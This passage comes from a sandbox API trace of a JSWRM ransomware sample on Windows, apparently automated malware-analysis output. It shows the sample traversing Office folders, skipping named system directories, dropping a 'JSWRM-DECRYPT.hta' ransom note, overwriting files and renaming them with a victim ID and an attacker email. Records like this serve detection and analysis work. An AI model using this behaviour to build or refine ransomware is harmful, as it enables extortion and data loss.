ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e114, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME55.CSS", cAlternateFileName="")) returned 0 [0118.583] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0118.583] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PUBSPAPR", cAlternateFileName="")) returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2=".") returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="..") returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="...") returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="windows") returned -1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="recovery") returned -1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="perflogs") returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="documents and settings") returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="$RECYCLE.BIN") returned 1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="system volume information") returned -1 [0118.583] lstrcmpiW (lpString1="PUBSPAPR", lpString2="msocache") returned 1 [0118.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0118.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0118.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0118.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0118.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\jswrm-decrypt.hta")) returned 0xffffffff [0118.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0118.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0118.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0118.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0118.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0118.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0118.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0118.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0118.589] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.589] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0118.590] CloseHandle (hObject=0x238) returned 1 [0118.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0118.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0118.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0118.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0118.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0118.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0118.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0118.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0118.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0118.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\jswrm-decrypt.hta")) returned 0x20 [0118.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0118.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0118.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0118.591] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3d57c4b3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0118.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0118.591] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3d57c4b3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0118.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0118.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0118.592] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d57c4b3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3d57c4b3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3d57c4b3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0118.592] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0118.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0118.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0118.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0118.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0118.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0118.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0118.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0118.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0118.592] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x182b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PAPERS.INI", cAlternateFileName="")) returned 1 [0118.592] lstrcmpiW (lpString1="PAPERS.INI", lpString2=".") returned 1 [0118.592] lstrcmpiW (lpString1="PAPERS.INI", lpString2="..") returned 1 [0118.592] lstrcmpiW (lpString1="PAPERS.INI", lpString2="...") returned 1 [0118.592] lstrcmpiW (lpString1="PAPERS.INI", lpString2="windows") returned -1 [0118.593] lstrcmpiW (lpString1="PAPERS.INI", lpString2="recovery") returned -1 [0118.593] lstrcmpiW (lpString1="PAPERS.INI", lpString2="perflogs") returned -1 [0118.593] lstrcmpiW (lpString1="PAPERS.INI", lpString2="documents and settings") returned 1 [0118.593] lstrcmpiW (lpString1="PAPERS.INI", lpString2="$RECYCLE.BIN") returned 1 [0118.593] lstrcmpiW (lpString1="PAPERS.INI", lpString2="system volume information") returned -1 [0118.593] lstrcmpiW (lpString1="PAPERS.INI", lpString2="msocache") returned 1 [0118.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPERS.INI", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPERS.INI", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PAPERS.INI", lpUsedDefaultChar=0x0) returned 10 [0118.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPERS.INI", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPERS.INI", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PAPERS.INI", lpUsedDefaultChar=0x0) returned 10 [0118.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0118.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0118.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PAPERS.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\papers.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.594] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6187) returned 1 [0118.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1820) returned 0x24c1d0 [0118.594] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1820, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1820, lpOverlapped=0x0) returned 1 [0118.596] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.596] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1820, lpOverlapped=0x0) returned 1 [0118.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.596] CloseHandle (hObject=0x314) returned 1 [0118.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0118.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0118.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0118.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0118.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0118.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0118.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0118.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PAPERS.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\papers.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PAPERS.INI.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\papers.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0118.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0118.597] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3bb5, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR10F.GIF", cAlternateFileName="")) returned 1 [0118.597] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2=".") returned 1 [0118.597] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="..") returned 1 [0118.597] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="...") returned 1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="windows") returned -1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="recovery") returned -1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="perflogs") returned -1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="documents and settings") returned 1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="system volume information") returned -1 [0118.598] lstrcmpiW (lpString1="PDIR10F.GIF", lpString2="msocache") returned 1 [0118.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0118.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR10F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR10F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR10F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0118.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0118.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR10F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR10F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR10F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0118.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0118.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR10F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir10f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.599] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15285) returned 1 [0118.599] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3bb0) returned 0x24c1d0 [0118.599] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3bb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x3bb0, lpOverlapped=0x0) returned 1 [0118.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.608] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x3bb0, lpOverlapped=0x0) returned 1 [0118.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.608] CloseHandle (hObject=0x314) returned 1 [0118.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0118.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.608] 